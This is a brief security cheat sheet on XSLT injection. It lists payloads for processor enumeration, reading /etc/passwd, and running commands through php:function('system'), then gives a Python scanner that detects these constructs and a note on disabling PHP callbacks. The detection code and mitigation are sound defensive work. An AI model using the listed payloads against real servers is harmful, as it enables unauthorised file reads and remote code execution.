Attacking XSLT
Injection for enumeration:
Version: <xsl:value-of select="system-property('xsl:version')" />
<br/>
Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
<br/>
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
<br/>
Product Name: <xsl:value-of select="system-property('xsl:product-name')" />
<br/>
Product Version: <xsl:value-of select="system-property('xsl:product-version')" />
LFI (XSLT 2.0 only):
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
LFI using PHP function:
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />
RCE:
<xsl:value-of select="php:function('system','id')" />
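A defender-side check for the constructs listed above, as an added example (not code from the original page): it scans a complete stylesheet before it reaches the processor and reports calls to system-property, unparsed-text, and any function in PHP's http://php.net/xsl namespace, whatever prefix is bound to it. The names scan_stylesheet, RISKY_CORE, CALL_RE and SAMPLE are assumptions of this example, and the sample stylesheet is constructed.

```python
import io
import re
import xml.etree.ElementTree as ET

PHP_NS = "http://php.net/xsl"  # namespace that PHP's XSL extension uses for php:function
# Core functions used by the payloads on this page (risk labels are this example's own).
RISKY_CORE = {"system-property": "processor enumeration",
              "unparsed-text": "local file read"}
# Optional prefix, function name, opening parenthesis.
CALL_RE = re.compile(r"(?:([A-Za-z_][\w.-]*):)?([A-Za-z_][\w.-]*)\s*\(")

def scan_stylesheet(xslt_text):
    """Return sorted (risk, call) pairs found in a complete stylesheet."""
    if "<!DOCTYPE" in xslt_text:  # refuse DTDs instead of expanding entities
        return [("DTD present, refused", "<!DOCTYPE")]
    findings, php_prefixes = set(), set()
    source = io.BytesIO(xslt_text.encode("utf-8"))
    # Malformed input raises ET.ParseError; callers should treat that as a reject.
    for event, item in ET.iterparse(source, events=("start-ns", "start")):
        if event == "start-ns":
            prefix, uri = item
            if uri == PHP_NS and prefix:
                php_prefixes.add(prefix)  # any prefix may be bound, not just "php"
            continue
        # XPath lives in attribute values: select, test, match, {...} templates.
        for value in item.attrib.values():
            for prefix, name in CALL_RE.findall(value):
                if prefix in php_prefixes:
                    findings.add(("PHP callback", f"{prefix}:{name}"))
                elif not prefix and name in RISKY_CORE:
                    findings.add((RISKY_CORE[name], name))
    return sorted(findings)

# Constructed sample: a stylesheet carrying this page's payloads.
SAMPLE = """<xsl:stylesheet version="2.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:p="http://php.net/xsl">
  <xsl:template match="/">
    <xsl:value-of select="system-property('xsl:vendor')"/>
    <xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
    <xsl:value-of select="p:function('file_get_contents','/etc/passwd')"/>
    <xsl:value-of select="concat(name, ' ', count(item))"/>
  </xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for risk, call in scan_stylesheet(SAMPLE):
        print(f"{risk}: {call}")
```

On PHP, php:function only resolves when the application has called XSLTProcessor::registerPHPFunctions(); leaving it unregistered, or passing it an allow-list of function names, closes the callback path that this scanner flags.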